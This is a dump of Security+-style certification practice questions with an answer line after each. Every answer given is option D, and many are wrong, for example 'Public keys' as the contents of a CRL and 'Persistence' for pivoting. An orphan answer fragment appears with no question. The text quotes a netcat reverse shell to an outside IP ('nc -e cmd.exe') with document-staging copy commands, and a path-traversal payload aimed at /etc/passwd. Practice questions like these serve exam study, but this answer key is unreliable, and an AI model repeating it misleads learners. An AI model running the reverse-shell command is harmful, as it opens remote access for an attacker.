After ten seconds, some of the computers shown in the IP Dst field start to exhibit the same behavior and immediately make multiple outbound connection attempts. Based on the observed behavior, which of the following is the MOST likely cause? A. Users are running port scans on the network. B. A malicious is performing an MITM attack. C. An amplified DDoS attack is in progress. D. A worm is attacking the network. E. A race condition is being leveraged.
D. A worm is attacking the network.
A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a known vulnerability. Which of the following risk responses does this BEST describe? A. Transference B. Avoidance C. Mitigation D. Acceptance
D. Acceptance
The security administrator needs to manage traffic on a layer 3 device to support FTP from a new remote site. Which of the following would need to be implemented? A. Implicit deny B. VLAN management C. Port security D. Access control lists
D. Access control lists
A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that all employees must have their badges rekeyed at least annually. Which of the following controls BEST describes this policy? A. Physical B. Corrective C. Technical D. Administrative
D. Administrative
A technician is investigating a potentially compromised device with the following symptoms:
Browser slowness
Frequent browser crashes
Hourglass stuck
New search toolbar
Increased memory consumption
Which of the following types of malware has infected the system? A. Man-in-the-browser B. Spoofer C. Spyware D. Adware
D. Adware
A security administrator wants to prevent standard users from running software they downloaded or copied to the computer. The security administrator finds the following permissions on the computer:
Folder Location        Administrator Permissions   Standard User Permissions
C:\                    RW                          RW
C:\OperatingSystem\    RW                          R
C:\Programs\           RW                          R
C:\TEMP\               RW                          RW
C:\ShippingDATA        RW                          RW
C:\Users\User1         R                           RW
C:\Users\Admin         RW                          .
The administrator needs to create a policy that specifies from which folders a low-privilege user can run applications. Which of the following application whitelist configurations would BEST accomplish this task? A. Allow: * Block: C:\TEMP, C:\Shipping DATA, C:\Users\User1 B. Allow: C:\, C:\OperatingSystem, C:\Programs, C:\Users\User1 Block: C:\TEMP, C:\ShippingDATA, C:\Users\User1 C. Allow: C:\ Block: C:\TEMP, C:\ShippingDATA, C:\Users\User1 D. Allow: C:\OperatingSystem\, C: Programs Block: *
D. Allow: C:\OperatingSystem\, C: Programs Block: *
Ann wants to send a file to Joe using PKI. Which of the following should Ann use in order to sign the file? A. Joe's public key B. Joe's private key C. Ann's public key D. Ann's private key
D. Ann's private key
Joe, a user, wants to send an encrypted email to Ann. Which of the following will Ann need to use to verify that the email came from Joe and decrypt it? (Select TWO). A. The CA's public key B. Ann's public key C. Joe's private key D. Ann's private key E. The CA's private key F. Joe's public key
D. Ann's private key F. Joe's public key
Suspicious traffic without a specific signature was detected. Under further investigation, it was determined that these were false indicators. Which of the following security devices needs to be configured to disable future false alarms? A. Signature based IPS B. Signature based IDS C. Application based IPS D. Anomaly based IDS
D. Anomaly based IDS
Which of the following MOST interferes with network-based detection techniques? A. Mime-encoding B. SSL C. FTP D. Anonymous email accounts
D. Anonymous email accounts
Which of the following will allow Pete, a security analyst, to trigger a security alert because of a tracking cookie? A. Network based firewall B. Anti-spam software C. Host based firewall D. Anti-spyware software
D. Anti-spyware software
The computer resource center issues smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the managers installed? A. Download manager B. Content manager C. Segmentation manager D. Application manager
D. Application manager
A recently installed application update caused a vital application to crash during the middle of the workday. The application remained down until a previous version could be reinstalled on the server, and this resulted in a significant loss of data and revenue. Which of the following could BEST prevent this issue from occurring again? A. Application configuration baselines B. Application hardening C. Application access controls D. Application patch management
D. Application patch management
The call center supervisor has reported that many employees have been playing preinstalled games on company computers and this is reducing productivity. Which of the following would be MOST effective for preventing this behavior? A. Acceptable use policies B. Host-based firewalls C. Content inspection D. Application whitelisting
D. Application whitelisting
A security analyst believes an employee's workstation has been compromised. The analyst reviews the system logs, but does not find any attempted logins. The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files that look suspicious. One of the files contains the following commands:
cmd /C %TEMP%\nc -e cmd.exe 34.100.43.230
copy *.doc > %TEMP%\docfiles.zip
copy *.xls > %TEMP%\xlsfiles.xip
copy *.pdf > %TEMP%\pdffiles.zip
Which of the following types of malware was used? A. Worm B. Spyware C. Logic bomb D. Backdoor
D. Backdoor
An analyst is part of a team that is investigating a potential breach of sensitive data at a large organization, which services the financial sector. The organization suspects a breach occurred when proprietary data was disclosed to the public. The team finds servers were accessed using shared credentials that have been in place for some time. In addition, the team discovers undocumented firewall rules, which provided unauthorized external access to a server. Suspecting the activities of a malicious insider threat, which of the following was MOST likely to have been utilized to exfiltrate the proprietary data? A. Keylogger B. Botnet C. Crypto-malware D. Backdoor E. Ransomware F. DLP
D. Backdoor
A computer is suspected of being compromised by malware. The security analyst examines the computer and finds that a service called Telnet is running and connecting to an external website over port 443. This Telnet service was found by comparing the system's services to the list of standard services on the company's system image. This review process depends on: A. MAC filtering. B. System hardening. C. Rogue machine detection. D. Baselining.
D. Baselining.
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats? A. Cloud-based antivirus solution, running as local admin, with push technology for definition updates B. Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all client computing needs C. Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewall ACLs D. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed
D. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed
An administrator is configuring a wireless network. Security policy states that deprecated cryptography should not be used when there is an alternative choice. Which of the following should the administrator use for the wireless network's cryptographic protocol? A. MD5 B. RC4 C. TKIP D. CCMP E. Diffie-Hellman
D. CCMP
Joe, a user, reports to the system administrator that he is receiving an error stating his certificate has been revoked. Which of the following is the name of the database repository for these certificates? A. CSR B. OSCP C. CA D. CRL
D. CRL
A security engineer must install the same X.509 certificate on servers in three different domains. The client application that connects to the server performs a check to ensure the certificate matches the hostname. Which of the following should the security engineer use? A. Wildcard certificate B. Extended validation certificate C. Certificate chaining D. Certificate utilizing the SAN field
D. Certificate utilizing the SAN field
A security engineer must install the same X.509 certificate on three different servers. The client application that connects to the server performs a check to ensure the certificate matches the host name. Which of the following should the security engineer use? A. Wildcard certificate B. Extended validation certificate C. Certificate chaining D. Certificate utilizing the SAN file
D. Certificate utilizing the SAN file
Computer evidence at a crime scene is documented with a tag stating who had possession of the evidence at a given time. Which of the following does this illustrate? A. System image capture B. Record time offset C. Order of volatility D. Chain of custody
D. Chain of custody
Developers currently have access to update production servers without going through an approval process. Which of the following strategies would BEST mitigate this risk? A. Incident management B. Clean desk policy C. Routine audits D. Change management
D. Change management
A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement? A. Hot site B. Warm site C. Cold site D. Cloud-based site
D. Cloud-based site
The information security team does a presentation on social media and advises the participants not to provide too much personal information on social media web sites. This advice would BEST protect people from which of the following? A. Rainbow tables attacks B. Brute force attacks C. Birthday attacks D. Cognitive passwords attacks
D. Cognitive passwords attacks
A cryptographer has developed a new proprietary hash function for a company and solicited employees to test the function before recommending its implementation. An employee takes the plaintext version of a document and hashes it, then changes the original plaintext document slightly and hashes it, and continues repeating this process until two identical hash values are produced from two different documents. Which of the following BEST describes this cryptographic attack? A. Brute force B. Known plaintext C. Replay D. Collision
D. Collision
A security analyst is hardening a WiFi infrastructure. The primary requirements are the following:
The infrastructure must allow staff to authenticate using the most secure method.
The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet.
Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure? A. Configure a captive portal for guests and WPS for staff. B. Configure a captive portal for staff and WPA for guests. C. Configure a captive portal for staff and WEP for guests. D. Configure a captive portal for guest and WPA2 Enterprise for staff.
D. Configure a captive portal for guest and WPA2 Enterprise for staff.
A security administrator has concerns regarding employees saving data on company provided mobile devices. Which of the following would BEST address the administrator's concerns? A. Install a mobile application that tracks read and write functions on the device. B. Create a company policy prohibiting the use of mobile devices for personal use. C. Enable GPS functionality to track the location of the mobile devices. D. Configure the devices so that removable media use is disabled.
D. Configure the devices so that removable media use is disabled.
A member of the IR team has identified an infected computer. Which of the following IR phases should the team member conduct NEXT? A. Eradication B. Recovery C. Lessons learned D. Containment
D. Containment
The information security technician wants to ensure security controls are deployed and functioning as intended to be able to maintain an appropriate security posture. Which of the following security techniques is MOST appropriate to do this? A. Log audits B. System hardening C. Use IPS/IDS D. Continuous security monitoring
D. Continuous security monitoring
A company is about to release a very large patch to its customers. An administrator is required to test patch installations several times prior to distributing them to customer PCs. Which of the following should the administrator use to test the patching process quickly and often? A. Create an incremental backup of an unpatched PC B. Create an image of a patched PC and replicate it to servers C. Create a full disk image to restore after each installation D. Create a virtualized sandbox and utilize snapshots
D. Create a virtualized sandbox and utilize snapshots
Joe, a member of the sales team, recently logged into the company servers after midnight local time to download the daily lead form before his co-workers did. Management has asked the security team to provide a method for detecting this type of behavior without impeding the access for sales employees as they travel overseas. Which of the following would be the BEST method to achieve this objective? A. Configure time-of-day restrictions for the sales staff. B. Install DLP software on the devices used by sales employees. C. Implement a filter on the mail gateway that prevents the lead form from being emailed. D. Create an automated alert on the SIEM for anomalous sales team activity.
D. Create an automated alert on the SIEM for anomalous sales team activity.
A new network administrator is setting up a new file server for the company. Which of the following would be the BEST way to manage folder security? A. Assign users manually and perform regular user access reviews B. Allow read only access to all folders and require users to request permission C. Assign data owners to each folder and allow them to add individual users to each folder D. Create security groups for each folder and assign appropriate users to each group
D. Create security groups for each folder and assign appropriate users to each group
A security administrator wants to determine if a company's web servers have the latest operating system and application patches installed. Which of the following types of vulnerability scan should be conducted? A. Non-credentialed B. Passive C. Port D. Credentialed E. Red team F. Active
D. Credentialed
A company is trying to limit the risk associated with the use of unapproved USB devices to copy documents. Which of the following would be the BEST technology control to use in this scenario? A. Content filtering B. IDS C. Audit logs D. DLP
D. DLP
A salesperson often uses a USB drive to save and move files from a corporate laptop. The corporate laptop was recently updated, and now the files on the USB are read-only. Which of the following was recently added to the laptop? A. Antivirus software B. File integrity check C. HIPS D. DLP
D. DLP
A security administrator is segregating all web-facing server traffic from the internal network and restricting it to a single interface on a firewall. Which of the following BEST describes this new network? A. VLAN B. Subnet C. VPN D. DM
D. DM
A security analyst wants to limit the use of USB and external drives to protect against malware, as well as protect files leaving a user's computer. Which of the following is the BEST method to use? A. Firewall B. Router C. Antivirus software D. Data loss prevention
D. Data loss prevention
Several employees have been printing files that include personally identifiable information of customers. Auditors have raised concerns about the destruction of these hard copies after they are created, and management has decided the best way to address this concern is by preventing these files from being printed. Which of the following would be the BEST control to implement? A. File encryption B. Printer hardening C. Clean desk policies D. Data loss prevention
D. Data loss prevention
A home invasion occurred recently in which an intruder compromised a home network and accessed a WiFi-enabled baby monitor while the baby's parents were sleeping. Which of the following BEST describes how the intruder accessed the monitor? A. Outdated antivirus B. WiFi signal strength C. Social engineering D. Default configuration
D. Default configuration
A systems administrator is deploying a new mission essential server into a virtual environment. Which of the following is BEST mitigated by the environment's rapid elasticity characteristic? A. Data confidentiality breaches B. VM escape attacks C. Lack of redundancy D. Denial of service
D. Denial of service
During a recent investigation, an auditor discovered that an engineer's compromised workstation was being used to connect to SCADA systems while the engineer was not logged in. The engineer is responsible for administering the SCADA systems and cannot be blocked from connecting to them. The SCADA systems cannot be modified without vendor approval which requires months of testing. Which of the following is MOST likely to protect the SCADA systems from misuse? A. Update anti-virus definitions on SCADA systems B. Audit accounts on the SCADA systems C. Install a firewall on the SCADA network D. Deploy NIPS at the edge of the SCADA network
D. Deploy NIPS at the edge of the SCADA network
A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is a requirement for this configuration? A. Setting up a server B. Configuring federation between authentication servers C. Enabling TOTP D. Deploying certificates to endpoint devices
D. Deploying certificates to endpoint devices
Ann, a security administrator, wishes to replace their RADIUS authentication with a more secure protocol, which can utilize EAP. Which of the following would BEST fit her objective? A. CHAP B. SAML C. Kerberos D. Diameter
D. Diameter
Company A submitted a bid on a contract to do work for Company B via email. Company B was insistent that the bid did not come from Company A. Which of the following would have assured that the bid was submitted by Company A? A. Steganography B. Hashing C. Encryption D. Digital Signatures
D. Digital Signatures
A technician has discovered a crypto-virus infection on a workstation that has access to sensitive remote resources. Which of the following is the immediate NEXT step the technician should take? A. Determine the source of the virus that has infected the workstation. B. Sanitize the workstation's internal drive. C. Reimage the workstation for normal operation. D. Disable the network connections on the workstation.
D. Disable the network connections on the workstation.
Which of the following preventative controls would be appropriate for responding to a directive to reduce the attack surface of a specific host? A. Installing anti-malware B. Implementing an IDS C. Taking a baseline configuration D. Disabling unnecessary services
D. Disabling unnecessary services
An incident response analyst at a large corporation is reviewing proxy log data. The analyst believes a malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO). Which of the following is the best NEXT step for the analyst to take? A. Call the CEO directly to ensure awareness of the event. B. Run a malware scan on the CEO's workstation. C. Reimage the CEO's workstation. D. Disconnect the CEO's workstation from the network.
D. Disconnect the CEO's workstation from the network.
A group of developers is collaborating to write software for a company. The developers need to work in subgroups and restrict access to their modules. Which of the following access control methods is considered user-centric? A. Role-based B. Mandatory C. Rule-based D. Discretionary
D. Discretionary
A security engineer is configuring a wireless network. The security requirements for the network are: mutual authentication of wireless clients and the authentication server; client authentication must be username and password; cannot use a certificate on the authentication server. Which of the following protocols BEST meets these requirements? A. EAP B. EAP-TLS C. EAP-TTLS D. EAP-FAST
D. EAP-FAST
A security administrator must implement a system to allow clients to securely negotiate encryption keys with the company's server over a public unencrypted communication channel. Which of the following implements the required secure key negotiation? (Select TWO). A. PBKDF2 B. Symmetric encryption C. Steganography D. ECDHE E. Diffie-Hellman
D. ECDHE E. Diffie-Hellman
Which of the following should be considered to mitigate data theft when using CAT5 wiring? A. CCTV B. Environmental monitoring C. Multimode fiber D. EMI shielding
D. EMI shielding
A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount. On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts? A. Employ time-of-day restrictions. B. Employ password complexity. C. Employ a random key generator strategy. D. Employ an account expiration strategy. E. Employ a password lockout policy.
D. Employ an account expiration strategy.
Ann would like to forward some Personal Identifiable Information to her HR department by email, but she is worried about the confidentiality of the information. Which of the following will accomplish this task securely? A. Digital Signatures B. Hashing C. Secret Key D. Encryption
D. Encryption
After copying a sensitive document from his desktop to a flash drive, Joe, a user, realizes that the document is no longer encrypted. Which of the following can a security technician implement to ensure that documents stored on Joe's desktop remain encrypted when moved to external media or other network based storage? A. Whole disk encryption B. Removable disk encryption C. Database record level encryption D. File level encryption
D. File level encryption
Methods to test the responses of software and web applications to unusual or unexpected inputs is known as: A. Brute force. B. HTML encoding. C. Web crawling. D. Fuzzing.
D. Fuzzing.
An administrator needs to submit a new CSR to a CA. Which of the following is a valid FIRST step? A. Generate a new private key based on AES. B. Generate a new public key based on RSA. C. Generate a new public key based on AES. D. Generate a new private key based on RSA.
D. Generate a new private key based on RSA.
Joe, a contractor, is hired by a firm to perform a penetration test against the firm's infrastructure. When conducting the scan, he receives only the network diagram and the network list to scan against the network. Which of the following scan types is Joe performing? A. Authenticated B. White box C. Automated D. Gray box
D. Gray box
Which of the following is the LEAST volatile when performing incident response procedures? A. Registers B. RAID cache C. RAM D. Hard drive
D. Hard drive
Joe analyzed the following log and determined the security team should implement which of the following as a mitigation method against further attempts? Host 192.168.1.123 [00:00:01] Successful Login: 015 192.168.1.123 : local [00:00:03] Unsuccessful Login: 022 214.34.56.006 : RDP 192.168.1.124 [00:00:04] UnSuccessful Login: 010 214.34.56.006 : RDP 192.168.1.124 [00:00:07] UnSuccessful Login: 007 214.34.56.006 : RDP 192.168.1.124 [00:00:08] UnSuccessful Login: 003 214.34.56.006 : RDP 192.168.1.124 A. Reporting B. IDS C. Monitor system logs D. Hardening
D. Hardening
Which of the following BEST explains the use of an HSM within the company servers? A. Thumb drives present a significant threat which is mitigated by HSM. B. Software encryption can perform multiple functions required by HSM. C. Data loss by removable media can be prevented with DLP. D. Hardware encryption is faster than software encryption.
D. Hardware encryption is faster than software encryption.
Which of the following is an effective way to ensure the BEST temperature for all equipment within a datacenter? A. Fire suppression B. Raised floor implementation C. EMI shielding D. Hot or cool aisle containment
D. Hot or cool aisle containment
Which of the following is the MOST specific plan for various problems that can arise within a system? A. Business Continuity Plan B. Continuity of Operation Plan C. Disaster Recovery Plan D. IT Contingency Plan
D. IT Contingency Plan
An incident response manager has started to gather all the facts related to a SIEM alert showing multiple systems may have been compromised. The manager has gathered these facts: the breach is currently indicated on six user PCs; one service account is potentially compromised; executive management has been notified. In which of the following phases of the IRP is the manager currently working? A. Recovery B. Eradication C. Containment D. Identification
D. Identification
The helpdesk reports increased calls from clients reporting spikes in malware infections on their systems. Which of the following phases of incident response is MOST appropriate as a FIRST response? A. Recovery B. Follow-up C. Validation D. Identification E. Eradication F. Containment
D. Identification
Which of the following is commonly done as part of a vulnerability scan? A. Exploiting misconfigured applications B. Cracking employee passwords C. Sending phishing emails to employees D. Identifying unpatched workstations
D. Identifying unpatched workstations
An IT security technician needs to establish host based security for company workstations. Which of the following will BEST meet this requirement? A. Implement IIS hardening by restricting service accounts. B. Implement database hardening by applying vendor guidelines. C. Implement perimeter firewall rules to restrict access. D. Implement OS hardening by applying GPOs.
D. Implement OS hardening by applying GPOs.
An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data.
Employee | Job Function | Audit Finding
Ann | Sales Manager | Access to confidential payroll shares; Access to payroll processing program; Access to marketing shares
Jeff | Marketing Director | Access to human resources annual review folder; Access to shared human resources mailbox
John | Sales Manager | Active account; Access to human resources annual review folder; Access to confidential payroll shares
Which of the following would be the BEST method to prevent similar audit findings in the future? A. Implement separation of duties for the payroll department B. Implement a DLP solution on the payroll and human resources reviews C. Implement rule-based access controls on the human resources server D. Implement regular permission auditing and reviews
D. Implement regular permission auditing and reviews
The incident response team has received the following email message: From: [email protected] To: [email protected] Subject: Copyright infringement A copyright infringement alert was triggered by IP address 13.10.66.5 at 09:50:01 GMT. After reviewing the following web logs for IP 13.10.66.5, the team is unable to correlate and identify the incident. 09:45:33 13.10.66.5 http://remote.site.com/login.asp?user=john 09:50:22 13.10.66.5 http://remote.site.com/logout.asp?user=anne 10:50:01 13.10.66.5 http://remote.site.com/access.asp?file=movie.mov 11:02:45 13.10.65.5 http://remote.site.com/download.asp?movie.mov=ok Which of the following is the MOST likely reason why the incident response team is unable to identify and correlate the incident? A. The logs are corrupt and no longer forensically sound. B. Traffic logs for the incident are unavailable. C. Chain of custody was not properly maintained. D. Incident time offsets were not accounted for.
D. Incident time offsets were not accounted for.
A company recently updated its website to increase sales. The new website uses PHP forms for leads and provides a directory with sales staff and their phone numbers. A systems administrator is concerned with the new website and provides the following log to support the concern: username JohnD does not exist, password prompt not supplied username DJohn does not exist, password prompt not supplied username JohnDoe exists, invalid password supplied username JohnDoe exists, invalid password supplied username JohnDoe exists, invalid password supplied username JohnDoe exists, account locked Which of the following is the systems administrator MOST likely to suggest to the Chief Information Security Officer (CISO) based on the above? A. Changing the account standard naming convention B. Implementing account lockouts C. Discontinuing the use of privileged accounts D. Increasing the minimum password length from eight to ten characters
D. Increasing the minimum password length from eight to ten characters
Use of group accounts should be minimized to ensure which of the following? A. Password security B. Regular auditing C. Baseline management D. Individual accountability
D. Individual accountability
Which of the following is a step in deploying a WPA2-Enterprise wireless network? A. Install a token on the authentication server B. Install a DHCP server on the authentication server C. Install an encryption key on the authentication server D. Install a digital certificate on the authentication server
D. Install a digital certificate on the authentication server
Pete, the system administrator, wishes to monitor and limit users' access to external websites. Which of the following would BEST address this? A. Block all traffic on port 80. B. Implement NIDS. C. Use server load balancers. D. Install a proxy server.
D. Install a proxy server.
Several workstations on a network are found to be on OS versions that are vulnerable to a specific attack. Which of the following is considered to be a corrective action to combat this vulnerability? A. Install an antivirus definition patch B. Educate the workstation users C. Leverage server isolation D. Install a vendor-supplied patch E. Install an intrusion detection system
D. Install a vendor-supplied patch
A software company has completed a security assessment. The assessment states that the company should implement fencing and lighting around the property. Additionally, the assessment states that production releases of their software should be digitally signed. Given the recommendations, the company was deficient in which of the following core security areas? (Select TWO). A. Fault tolerance B. Encryption C. Availability D. Integrity E. Safety F. Confidentiality
D. Integrity E. Safety
A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which of the following types of scans MOST likely caused the outage? A. Non-intrusive credentialed scan B. Non-intrusive non-credentialed scan C. Intrusive credentialed scan D. Intrusive non-credentialed scan
D. Intrusive non-credentialed scan
A certificate authority takes which of the following actions in PKI? A. Signs and verifies all infrastructure messages B. Issues and signs all private keys C. Publishes key escrow lists to CRLs D. Issues and signs all root certificates
D. Issues and signs all root certificates
Which of the following BEST explains why sandboxing is a best practice for testing software from an untested vendor prior to an enterprise deployment? A. It allows the software to run in an unconstrained environment with full network access B. It eliminates the possibility of privilege escalation attacks against the local VM host C. It facilitates the analysis of possible malware by allowing it to run until resources are exhausted D. It restricts access of the software to a contained logical space and limits possible damage
D. It restricts access of the software to a contained logical space and limits possible damage
Which of the following is true about input validation in a client-server architecture, when data integrity is critical to the organization? A. It should be enforced on the client side only. B. It must be protected by SSL encryption. C. It must rely on the user's knowledge of the application. D. It should be performed on the server side.
D. It should be performed on the server side.
A security analyst receives an alert from a WAF with the following payload: var data = "<test test test> ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this? A. Cross-site request forgery B. Buffer overflow C. SQL injection D. JavaScript data insertion E. Firewall evasion script
D. JavaScript data insertion
Which of the following authentication services requires the use of a ticket-granting ticket (TGT) server in order to complete the authentication process? A. TACACS+ B. Secure LDAP C. RADIUS D. Kerberos
D. Kerberos
Ann, a user, states that her machine has been behaving erratically over the past week. She has experienced slowness and input lag and found text files that appear to contain pieces of her emails or online conversations with coworkers. The technician runs a standard virus scan but detects nothing. Which of the following types of malware has infected the machine? A. Ransomware B. Rootkit C. Backdoor D. Keylogger
D. Keylogger
A system administrator is configuring UNIX accounts to authenticate against an external server. The configuration file asks for the following information: DC=ServerName and DC=COM. Which of the following authentication services is being used? A. RADIUS B. SAML C. TACACS+ D. LDAP
D. LDAP
Which of the following was based on a previous X.500 specification and allows either unencrypted authentication or encrypted authentication through the use of TLS? A. Kerberos B. TACACS+ C. RADIUS D. LDAP
D. LDAP
Jane, a security administrator, needs to implement a secure wireless authentication method that uses a remote RADIUS server for authentication. Which of the following is an authentication method Jane should use? A. WPA2-PSK B. WEP-PSK C. CCMP D. LEAP
D. LEAP
A company is looking to improve their security posture by addressing risks uncovered by a recent penetration test. Which of the following risks is MOST likely to affect the business on a day-to-day basis? A. Insufficient encryption methods B. Large scale natural disasters C. Corporate espionage D. Lack of antivirus software
D. Lack of antivirus software
A penetration tester is assessing a large organization and obtains a valid set of basic user credentials from a compromised computer. Which of the following is the MOST likely to occur? A. Impersonation B. Credential harvesting C. Password cracking D. Lateral movement
D. Lateral movement
A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer? A. Round-robin B. Weighted C. Least connection D. Locality-based
D. Locality-based
This condition exists when data units can travel from a first LAN segment to a second LAN segment through more than one path and is solved by STP? A. Logic bomb B. Flooding C. MAC spoofing D. Looping
D. Looping
Which of the following should Pete, a security manager, implement to reduce the risk of employees working in collusion to embezzle funds from their company? A. Privacy Policy B. Least Privilege C. Acceptable Use D. Mandatory Vacations
D. Mandatory Vacations
B. Dumpster diving
D. Mantrap
A network administrator is creating a new network for an office. For security purposes, each department should have its resources isolated from every other department but be able to communicate back to central servers. Which of the following architecture concepts would BEST accomplish this? A. Air gapped network B. Load balanced network C. Network address translation D. Network segmentation
D. Network segmentation
A company is implementing an internal PKI. The design will include a CA and a subordinate CA. Which of the following CA design choices should be considered prior to implementation? A. Wildcard vs. standard certificate B. Subject field vs. subject alternative name field C. Private vs. public D. Online vs. offline E. Stapling vs. pinning
D. Online vs. offline
Ann is the IS manager for several new systems in which the classification of the systems' data is being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner
D. Owner
A company wants to implement a wireless network with the following requirements: All wireless users will have a unique credential. User certificates will not be required for authentication. The company's AAA infrastructure must be utilized. Local hosts should not store authentication tokens. Which of the following should be used in the design to meet the requirements? A. EAP-TLS B. WPS C. PSK D. PEAP
D. PEAP
An office manager found a folder that included documents with various types of data relating to corporate clients. The office manager noted that the data included dates of birth, addresses, and phone numbers for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred? A. Public B. Private C. PHI D. PII
D. PII
Which of the following would provide additional security by adding another factor to a smart card? A. Token B. Proximity badge C. Physical key D. PIN
D. PIN
An organization recently moved its custom web applications to the cloud, and it is obtaining managed services of the back-end environment as part of its subscription. Which of the following types of services is this company now using? A. SaaS B. CASB C. IaaS D. PaaS
D. PaaS
Users can authenticate to a company's web applications using their credentials from a popular social media site. Which of the following poses the greatest risk with this integration? A. Malicious users can exploit local corporate credentials with their social media credentials B. Changes to passwords on the social media site can be delayed from replicating to the company C. Data loss from the corporate servers can create legal liabilities with the social media site D. Password breaches to the social media site affect the company application as well
D. Password breaches to the social media site affect the company application as well
After a company has standardized to a single operating system, not all servers are immune to a well-known OS vulnerability. Which of the following solutions would mitigate this issue? A. Host based firewall B. Initial baseline configurations C. Discretionary access control D. Patch management system
D. Patch management system
A penetration tester uses an exploited network printer as a base of operations to expand access to various workstations. Which of the following BEST describes the tester's actions? A. Pivoting B. Passive reconnaissance C. Active reconnaissance D. Persistence
D. Persistence
A web server, which is configured to use TLS with AES-GCM-256, SHA-384, and ECDSA, recently suffered an information loss breach. Which of the following is MOST likely the cause? A. Insufficient key bit length B. Weak cipher suite C. Unauthenticated encryption method D. Poor implementation
D. Poor implementation
A penetration testing team deploys a specifically crafted payload to a web server, which results in opening a new session as the web server daemon. The session has full read/write access to the file system and the admin console. Which of the following BEST describes the attack? A. Domain hijacking B. Injection C. Buffer overflow D. Privilege escalation
D. Privilege escalation
An organization has an account management policy that defines parameters around each type of account. The policy specifies different security attributes, such as longevity, usage auditing, password complexity, and identity proofing. The goal of the account management policy is to ensure the highest level of security while providing the greatest availability without compromising data integrity for users. Which of the following account types should the policy specify for service technicians from corporate partners? A. Guest account B. User account C. Shared account D. Privileged user account E. Default account F. Service account
D. Privileged user account
Also known as packet sniffers, these tools help you troubleshoot network issues by gathering packet-level information across the network? A. Vulnerability scanners B. Exploitation frameworks C. Configuration compliance D. Protocol analyzers
D. Protocol analyzers
Which of the following should the security administrator implement to limit web traffic based on country of origin? (Select THREE). A. Spam filter B. Load balancer C. Antivirus D. Proxies E. Firewall F. NIDS G. URL filtering
D. Proxies E. Firewall G. URL filtering
A CRL is comprised of: A. Malicious IP addresses. B. Trusted CAs. C. Untrusted private keys. D. Public keys.
D. Public keys.
Joe recently assumed the role of data custodian for his organization. While cleaning out an unused storage safe, he discovers several hard drives that are labeled "unclassified" and awaiting destruction. The hard drives are obsolete and cannot be installed in any of his current computing equipment. Which of the following is the BEST method for disposing of the hard drives? A. Burning B. Wiping C. Purging D. Pulverizing
D. Pulverizing
Which of the following is an authentication service that uses UDP as a transport medium? A. TACACS+ B. LDAP C. Kerberos D. RADIUS
D. RADIUS
A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure? A. L2TP with MAC filtering B. EAP-TTLS C. WPA2-CCMP with PSK D. RADIUS federation
D. RADIUS federation
A user, Ann, is reporting to the company IT support group that her workstation screen is blank other than a window with a message requesting payment or else her hard drive will be formatted. Which of the following types of malware is on Ann's workstation? A. Trojan B. Spyware C. Adware D. Ransomware
D. Ransomware
Deploying a wildcard certificate is one strategy to: A. Secure the certificate's private key. B. Increase the certificate's encryption key length. C. Extend the renewal date of the certificate. D. Reduce the certificate management burden.
D. Reduce the certificate management burden.
A security analyst is investigating a potential breach. Upon gathering, documenting, and securing the evidence, which of the following actions is the NEXT step to minimize the business impact? A. Launch an investigation to identify the attacking host B. Initiate the incident response plan C. Review lessons learned captured in the process D. Remove malware and restore the system to normal operation
D. Remove malware and restore the system to normal operation
Of the below terms, which one best describes the type of attack that captures portions of a session to play back later to convince a host that it continues to communicate with the original system? A. IP hijacking B. Jamming C. Trojan D. Replay
D. Replay
An external auditor visits the human resources department and performs a physical security assessment. The auditor observed documents on printers that are unclaimed. A closer look at these documents reveals employee names, addresses, ages, and types of medical and dental coverage options each employee has selected. Which of the following is the MOST appropriate action to take? A. Flip the documents face down so no one knows these documents are PII sensitive B. Shred the documents and let the owner print the new set C. Retrieve the documents, label them with a PII cover sheet, and return them to the printer D. Report to the human resources manager that their personnel are violating a privacy policy
D. Report to the human resources manager that their personnel are violating a privacy policy
Pete, the security engineer, would like to prevent wireless attacks on his network. Pete has implemented a security control to limit the connecting MAC addresses to a single port. Which of the following wireless attacks would this address? A. Interference B. Man-in-the-middle C. ARP poisoning D. Rogue access point
D. Rogue access point
The security administrator is currently unaware of an incident that occurred a week ago. Which of the following will ensure the administrator is notified in a timely manner in the future? A. User permissions reviews B. Incident response team C. Change management D. Routine auditing
D. Routine auditing
Ann has read and write access to an employee database, while Joe has only read access. Ann is leaving for a conference. Which of the following types of authorization could be utilized to trigger write access for Joe when Ann is absent? A. Mandatory access control B. Role-based access control C. Discretionary access control D. Rule-based access control
D. Rule-based access control
